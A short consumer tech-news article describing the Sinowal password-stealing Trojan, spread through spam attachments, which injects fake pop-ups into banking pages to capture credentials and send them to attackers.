Trojan Psw Win32 Sinowalu Next Gen Phishing Scam

Dennis Faas's picture

Recently, Kaspersky Labs detected a new form of spam email which contains an attachment of a password-stealing Trojan horse.

The attached malware, which is software designed to infiltrate or damage a computer system without the owner's consent, is called "Trojan-PSW.Win32.Sinowal.u" (herein referred to as "PSW"). (Source:

Senior research engineers at Kaspersky Lab refer to PSW as being "the next-generation Trojan." The variant is part of the "Sinowal" family of password stealing Trojans, which is designed to steal usernames and passwords entered via forms in an internet browser. (Source:

How Trojan-PSW.Win32.Sinowal.u Steals Passwords

PSW particularly targets banking web sites and also has the ability to steal other locally stored passwords.

When an infected user has started a secure bank transaction, the Trojan can insert its own HTML code onto the page being viewed. Typically, a pop up window will appear and ask the user for personal information, such as a username or password. (Source:

The Trojan will send the information it gathers directly to the hacker, and is also capable of checking for updates of itself. The infected user cannot simply clean their system; they also have to change all of their passwords. (Source:

In essence, PSW is a new twist on email phishing schemes.

Rate this article: 
No votes yet